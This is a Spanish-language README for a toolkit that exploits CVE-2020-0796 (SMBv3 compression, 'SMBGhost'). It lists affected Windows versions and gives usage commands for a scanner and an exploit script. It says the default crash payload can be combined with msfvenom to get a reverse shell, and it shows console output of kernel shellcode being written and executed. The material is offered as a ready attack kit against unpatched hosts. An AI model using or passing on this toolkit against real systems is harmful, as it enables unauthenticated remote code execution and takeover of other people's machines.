
Kit de herramientas de explotación para cve-2020-0796
CVE-2020-0796 se debe a un error en el protocolo SMBv3 al procesar paquetes de datos comprimidos maliciosos: al descomprimir el paquete, se utiliza la longitud proporcionada por el cliente sin comprobar si dicha longitud es válida, lo que finalmente provoca un desbordamiento de enteros. Esto permite que un atacante remoto no autenticado ejecute código arbitrario en el sistema de destino. Esta vulnerabilidad es similar a EternalBlue (MS17-010).
Versiones afectadas: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)
scanner.py Escanea y detecta hosts vulnerables a CVE-2020-0796. Formato: python scanner.py ip Ejemplo: python scanner.py 192.168.1.2
exploit.py Lanza un ataque contra el host de destino vulnerable. El PoC predeterminado provoca una pantalla azul (BSOD); debe combinarse con msfvenom para generar un PoC de reverse shell. Formato: python exploit.py -ip ip Ejemplo: python exploit.py -ip 192.168.1.2
Salida: [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly...